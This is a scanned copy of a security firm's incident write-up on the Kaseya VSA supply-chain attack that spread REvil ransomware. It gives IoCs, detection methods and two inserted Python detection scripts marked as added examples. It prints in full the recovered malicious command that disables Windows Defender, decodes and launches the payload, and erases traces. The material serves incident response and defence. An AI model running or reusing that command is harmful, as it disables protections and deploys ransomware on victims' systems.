Submitted URL: https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
Effective URL: https://www.truesec.com/hub/blog/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware
Submission: On May 02 via api from US — Scanned from DE
Blog 2021-10-07
A TRUESEC INVESTIGATION

KASEYA SUPPLY CHAIN ATTACK TARGETING MSPS TO DELIVER REVIL RANSOMWARE

Kaseya VSA, a product commonly used by MSPs to manage their clients' IT environments, was used as part of a supply chain attack delivering REvil ransomware to thousands of organizations.

7 min read. Fabio Viggiani

EDIT 2021-07-04 17:40 CET: Added redacted screenshots of exploit traffic
EDIT 2021-07-04 23:10 CET: Added additional details and attack overview
EDIT 2021-07-05 19:40 CET: Added methods to identify compromised systems
EDIT 2021-07-06 17:14 CET: Added link to script to identify infected systems
EDIT 2021-07-08 14:45 CET: Further clarified the identified steps of the exploit

We have been investigating this issue and our CSIRT team has been working around the clock to help affected organizations. We are thankful for all the information that other security researchers and response teams have been sharing, such as Huntress and Kevin Beaumont. So far, we don’t see any substantial discrepancy between the results of our investigation and the publicly available IOCs that have been shared.
ATTACK OVERVIEW

Kaseya customers using the on-prem VSA server were affected by this attack. The VSA server is used to manage large fleets of computers and is normally used by MSPs to manage all their clients. Without separation between client environments, this creates a dependency: if the VSA server is compromised, all client environments managed from this server can be compromised too. Additionally, if the VSA server is exposed to the internet, any potential vulnerability could be leveraged over the Internet to breach the server. This is what happened in this case.

The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. The vulnerability was exploited to introduce a malicious script that was sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.

(Figure: Overview of the attack)

VSA SERVER ZERO-DAY

We have identified the exploit code used by the threat actor to compromise the Internet-facing VSA servers. Since a patch has been available since July 11, and after we have validated the patch and verified that the attack vector is no longer present, we published the details of the exploit in a follow-up technical post. Thank you Visma for extracting traffic data from your DarkTrace appliances and providing it to us for investigation.

Truesec has confirmed the complete exploit chain and produced a working proof-of-concept exploit. The following vulnerabilities were chained in the exploit:

* Authentication Bypass
* Arbitrary File Upload
* Request Forgery Token Bypass
* Local File Code Injection

(Figure: Attack Kill Chain)

We want to share an IP address that we have identified, used to launch the exploit:

161[.]35.239.148
User-Agent: curl/7.69.1

Organizations and response teams can use this to identify if exploitation was launched against the VSA servers.
Note that as part of the exploitation, the IIS logs are cleared; therefore a lack of indications in the IIS logs does not necessarily mean that the system was not exploited. At this time, we do not know if the threat actor changed the source IP address for each exploited VSA server; however, we expect a large overlap.

(Figure: Part of Exploit Against VSA Server)

MALICIOUS PROCEDURE TO CLIENTS

The code executed on the VSA server as part of the exploit triggered execution of a malicious procedure on computers managed by the server. This effectively reaches all managed clients. As the first stage deletes logs in multiple locations (IIS logs as well as logs stored in the application database), not all the steps have been reconstructed yet. However, the procedure pushed to the clients was recovered and is reported below.

execFile(): Path="C:\windows\system32\cmd.exe", arg="/c ping 127.0.0.1 -n 7615 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking1\agent.crt c:\kworking1\agent.exe & del /q /f c:\kworking1\agent.crt C:\Windows\cert.exe & c:\kworking1\agent.exe", flag=0x00000002, timeout=0 seconds

This disables some features of Windows Defender, uses certutil to decode the previously uploaded agent.crt to agent.exe, and executes it. When executed, agent.exe will drop two additional files: MsMpEng.exe (a legitimate version of the Windows Defender binary) and mpsvc.dll (REvil ransomware).
The execution of MsMpEng.exe triggers the loading of mpsvc.dll (side-loading execution) and therefore executes the REvil ransomware in the context of MsMpEng.exe.

METHODS TO IDENTIFY COMPROMISED SYSTEMS – KASEYA VSA

Truesec has identified several methods to detect if systems are affected. This is possible both for a device with a Kaseya agent installed and on a central Kaseya VSA server.

Several logs such as the web server and database logs are cleared or deleted on the Kaseya VSA servers we have investigated. However, we were able to discover at least one log file that contained valuable data. In our case, this log file was located at D:\Kaseya\Kserver\Kserver.log. When inspecting the content of the file, we were able to find traces of the “agent.crt” file being sent out to systems. The log for a specific system looks as follows:

[I 2021-07-02T13:59:59.544250Z +02:00 ] [ProcessCmd] Systemname-and-Kaseya-agent-details (REDACTED) logged in successfully.
[I 2021-07-02T14:00:01.512990Z +02:00 1840 16cc] [EVENT_SERVER] Fri Jul 2 16:00:01 2021: [5836] WARNING: Write File task will rewrite entire file '#agentWrkDir#\agent.crt' to 'Systemname-and-Kaseya-agent-details' (REDACTED) because the timestamp of the file on the server has changed.
[I 2021-07-02T14:00:01.559863Z +02:00 1840 12b4] [EVENT_SERVER] Fri Jul 2 16:00:01 2021: [4788] Write File task continuing previous transfer to file '#agentWrkDir#\agent.crt' at offset 1221800 of 1221802 bytes for 'Systemname-and-Kaseya-agent-details' (REDACTED). Process time = 0 seconds.

These log entries indicate that an attempt was made to send out the file “agent.crt” to the working directory (default C:\kworking) of the target machine. As such, it is possible from the central Kaseya VSA servers to identify which systems were targeted. We have also confirmed that systems can be part of the list where an attempt at encrypting them was made but was unsuccessful.
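The two server-side checks described above, the IIS log search for the published source IP and User-Agent and the Kserver.log search for agent.crt being pushed to agents, as an added example. This is not Truesec's script and not part of the original post: the IIS W3C parser takes its column names from the `#Fields:` directive, the Kserver.log regex follows the three log lines quoted above, and the host names, benign requests and the second agent.crt push in the sample data are constructed; only the IP address and User-Agent come from the post.

```python
import re
from collections import defaultdict
from typing import Dict, Iterator, List, Optional

# Indicators quoted in the post for the exploit launched at Internet-facing VSA servers.
EXPLOIT_SOURCE_IP = "161.35.239.148"
EXPLOIT_USER_AGENT = "curl/7.69.1"


def parse_w3c_iis_log(log_text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request from an IIS W3C extended log file.

    Column names are taken from the '#Fields:' directive, so the parser adapts
    to whatever field selection the server was configured with.
    """
    fields: List[str] = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other directives (#Software, #Date, ...) and blank lines
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def find_exploit_requests(iis_log_text: str) -> List[Dict[str, str]]:
    """Requests from the published source IP or carrying the published User-Agent."""
    hits = []
    for rec in parse_w3c_iis_log(iis_log_text):
        # IIS writes spaces inside the User-Agent as '+'.
        user_agent = rec.get("cs(User-Agent)", "").replace("+", " ")
        if rec.get("c-ip") == EXPLOIT_SOURCE_IP or user_agent == EXPLOIT_USER_AGENT:
            hits.append(rec)
    return hits


# Kserver.log: every line starts with a bracketed timestamp; "Write File task"
# entries name the file and the agent it is pushed to, with an optional offset.
KSERVER_TS_RE = re.compile(r"^\[I (?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+Z)")
WRITE_FILE_RE = re.compile(
    r"Write File task (?:will rewrite entire file|continuing previous transfer to file) "
    r"'(?P<path>[^']+)'"
    r"(?: at offset (?P<offset>\d+) of (?P<size>\d+) bytes)?"
    r" (?:to|for) '(?P<agent>[^']+)'"
)


def find_file_pushes(kserver_log_text: str, filename: str = "agent.crt") -> Dict[str, List[dict]]:
    """Map each agent name to the Write File events that pushed `filename` to it."""
    pushes: Dict[str, List[dict]] = defaultdict(list)
    for line in kserver_log_text.splitlines():
        ts = KSERVER_TS_RE.match(line)
        write = WRITE_FILE_RE.search(line)
        if not (ts and write):
            continue
        if not write.group("path").lower().endswith(filename.lower()):
            continue  # other Write File tasks (inventory, scripts) are normal VSA activity
        offset: Optional[int] = int(write.group("offset")) if write.group("offset") else None
        size: Optional[int] = int(write.group("size")) if write.group("size") else None
        pushes[write.group("agent")].append(
            {"timestamp": ts.group("ts"), "path": write.group("path"), "offset": offset, "size": size}
        )
    return dict(pushes)


# Constructed sample data for a stand-alone run: host names, URIs and the benign
# requests are invented; only the IP and User-Agent are from the post.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2021-07-02 13:58:10 10.0.0.5 GET /uri-redacted - 443 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0) 200
2021-07-02 13:58:41 10.0.0.5 POST /uri-redacted - 443 161.35.239.148 curl/7.69.1 200
2021-07-02 13:59:02 10.0.0.5 POST /uri-redacted - 443 203.0.113.9 curl/7.69.1 401
"""

SAMPLE_KSERVER_LOG = r"""
[I 2021-07-02T13:59:59.544250Z +02:00 ] [ProcessCmd] WS-ALPHA.example.local logged in successfully.
[I 2021-07-02T14:00:01.512990Z +02:00 1840 16cc] [EVENT_SERVER] Fri Jul 2 16:00:01 2021: [5836] WARNING: Write File task will rewrite entire file '#agentWrkDir#\agent.crt' to 'WS-ALPHA.example.local' because the timestamp of the file on the server has changed.
[I 2021-07-02T14:00:01.559863Z +02:00 1840 12b4] [EVENT_SERVER] Fri Jul 2 16:00:01 2021: [4788] Write File task continuing previous transfer to file '#agentWrkDir#\agent.crt' at offset 1221800 of 1221802 bytes for 'WS-ALPHA.example.local'. Process time = 0 seconds.
[I 2021-07-02T14:00:03.100000Z +02:00 1840 12b4] [EVENT_SERVER] Fri Jul 2 16:00:03 2021: [4790] Write File task will rewrite entire file '#agentWrkDir#\inventory.xml' to 'WS-BETA.example.local' because the timestamp of the file on the server has changed.
[I 2021-07-02T14:00:05.200000Z +02:00 1840 16cc] [EVENT_SERVER] Fri Jul 2 16:00:05 2021: [5840] WARNING: Write File task will rewrite entire file '#agentWrkDir#\agent.crt' to 'SRV-GAMMA.example.local' because the timestamp of the file on the server has changed.
"""

if __name__ == "__main__":
    for rec in find_exploit_requests(SAMPLE_IIS_LOG):
        print("IIS hit:", rec["date"], rec["time"], rec["c-ip"], rec["cs(User-Agent)"])
    for agent, events in find_file_pushes(SAMPLE_KSERVER_LOG).items():
        print("agent.crt pushed to", agent, "at", [e["timestamp"] for e in events])
```

Because the post notes that the IIS logs are cleared during exploitation, an empty result from `find_exploit_requests` is not evidence that a server was untouched; the Kserver.log pass is the more reliable of the two, and the agent names it returns are the systems to triage first.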
METHODS TO IDENTIFY COMPROMISED SYSTEMS – SYSTEMS WITH AGENT

On a device that has a Kaseya agent installed, many different indicators exist. This list contains several methods which have been relevant in the cases we investigated so far.

ENCRYPTION

* The registry key HKLM:\SOFTWARE\Wow6432Node\BlackLivesMatter, which contains information related to the ransomware
* The ransomware “readme” file and files with the same file ending as the “-readme.txt” noted prefix

ATTEMPTS TO EXECUTE MALICIOUS CODE

It is possible that there was an attempt at executing the malicious code, but where the execution was unsuccessful. In such cases the following identification methods are valuable:

* C:\Windows\System32\winevt\Logs\Windows Powershell.evtx – Check for the malicious PowerShell execution “Set-MpPreference -DisableRealtimeMonitoring …”
* Any of the files noted in the IoC list. The “C:\kworking” directory is based on the working directory for the Kaseya agent, which is defined in the registry key HKLM:\SOFTWARE\Wow6432Node\Kaseya\Agent. Multiple agents can be installed, and therefore multiple versions of the files.
* Signs of the malicious execution in the Kaseya AgentMon log located at: C:\Program Files (x86)\Kaseya\\AgentMon.log
* Running process agent.exe
* Running process MsMpEng.exe with loaded mpsvc.dll

We have also released a script to help victims and responders of the Kaseya ransomware attack to identify and mitigate affected systems. This is for the end systems, not the VSA servers.

IOCS

161[.]35.239.148
mpsvc.dll 8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD
agent.exe D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E
agent.crt 45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C

YOUTUBE VIDEO

We held a live webinar for approximately 35 minutes to answer many of the questions we have received.
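The agent-side checks above (the Set-MpPreference execution in the PowerShell log, and the files from the IoC list under the agent working directory), as an added example that is not Truesec's released script and not part of the original post. It scores recovered command-line strings against the traits of the procedure quoted earlier (several Defender switches at once, certutil copied and used to decode agent.crt, the long ping delay) so that a single legitimate `Set-MpPreference` change is not flagged, and matches file hashes against the three SHA-256 values from the IoC list. Reading the .evtx file itself is assumed to be done by whatever log tooling is at hand; the function takes the extracted command lines as plain strings. The two benign command lines in the sample and the working-directory names passed in the usage are constructed.

```python
import hashlib
import re
from pathlib import Path
from typing import Dict, Iterable, List

# SHA-256 values from the post's IoC list (copied as published, compared lower-case).
IOC_SHA256: Dict[str, str] = {
    h.lower(): name
    for h, name in (
        ("8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD", "mpsvc.dll"),
        ("D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E", "agent.exe"),
        ("45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C", "agent.crt"),
    )
}

# Defender settings the recovered procedure turns off via Set-MpPreference.
DEFENDER_TAMPER_FLAGS = (
    "-DisableRealtimeMonitoring",
    "-DisableIntrusionPreventionSystem",
    "-DisableIOAVProtection",
    "-DisableScriptScanning",
    "-MAPSReporting Disabled",
    "-SubmitSamplesConsent NeverSend",
)


def score_command_line(cmd: str) -> Dict[str, object]:
    """Check one recorded command line for the traits of the procedure in the post."""
    lowered = cmd.lower()
    flags = [f for f in DEFENDER_TAMPER_FLAGS if f.lower() in lowered]
    findings: Dict[str, object] = {
        "set_mppreference": "set-mppreference" in lowered,
        "defender_flags": flags,
        # certutil copied under a new name, then used to decode agent.crt
        "certutil_copy": bool(re.search(r"copy\s+/y\s+\S*certutil\.exe", lowered)),
        "certutil_decode": bool(re.search(r"cert(?:util)?\.exe\s+-decode\s+\S*agent\.crt", lowered)),
        # long ping loop used as a sleep before the payload runs
        "ping_delay": bool(re.search(r"ping\s+127\.0\.0\.1\s+-n\s+\d{3,}", lowered)),
    }
    # One Set-MpPreference switch can be routine admin work; several tampering
    # switches at once, or decoding agent.crt, is the pattern from the attack.
    findings["suspicious"] = (
        (findings["set_mppreference"] and len(flags) >= 3)
        or findings["certutil_decode"]
        or (findings["certutil_copy"] and findings["ping_delay"])
    )
    return findings


def scan_command_lines(records: Iterable[str]) -> List[Dict[str, object]]:
    """Return findings (with the offending command) for every suspicious record."""
    out = []
    for record in records:
        findings = score_command_line(record)
        if findings["suspicious"]:
            findings["command"] = record
            out.append(findings)
    return out


def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def candidate_files(working_dirs: Iterable[str]) -> List[Path]:
    """Files carrying an IoC name directly under each agent working directory."""
    names = set(IOC_SHA256.values())
    return [p for d in working_dirs for p in Path(d).glob("*") if p.name.lower() in names]


def match_ioc_hashes(paths: Iterable[Path]) -> Dict[str, str]:
    """Map each readable file whose SHA-256 is in the IoC list to the IoC name."""
    hits: Dict[str, str] = {}
    for p in paths:
        try:
            digest = sha256_of(p)
        except OSError:
            continue  # unreadable or already deleted
        if digest in IOC_SHA256:
            hits[str(p)] = IOC_SHA256[digest]
    return hits


# Constructed sample: the first entry is the procedure quoted in the post, the
# other two are invented benign command lines that must not be flagged.
SAMPLE_COMMAND_LINES = [
    r"/c ping 127.0.0.1 -n 7615 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking1\agent.crt c:\kworking1\agent.exe & del /q /f c:\kworking1\agent.crt C:\Windows\cert.exe & c:\kworking1\agent.exe",
    r"powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true",  # single switch, admin test
    r"certutil.exe -hashfile C:\Users\admin\Downloads\setup.msi SHA256",  # ordinary certutil use
]

if __name__ == "__main__":
    for hit in scan_command_lines(SAMPLE_COMMAND_LINES):
        print("suspicious:", hit["defender_flags"], "decode:", hit["certutil_decode"])
    # Working directories come from the agent registry key; these two are placeholders.
    print(match_ioc_hashes(candidate_files([r"C:\kworking", r"C:\kworking1"])))
```

Since more than one agent can be installed, the working directories passed to `candidate_files` should be read from each HKLM:\SOFTWARE\Wow6432Node\Kaseya\Agent entry rather than assumed; a hash match on agent.crt alone shows the file was delivered, and the command-line findings or a running agent.exe show whether it was also executed.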
Due to the nature of the exploit, and the fact that it is zero-day, we are not disclosing any specific details of the exploit. We have shared the details directly with Kaseya.

EDIT: since a patch has been available since July 11, and after we have validated the patch and verified that the attack vector is no longer present, we published the details of the exploit in a follow-up technical post.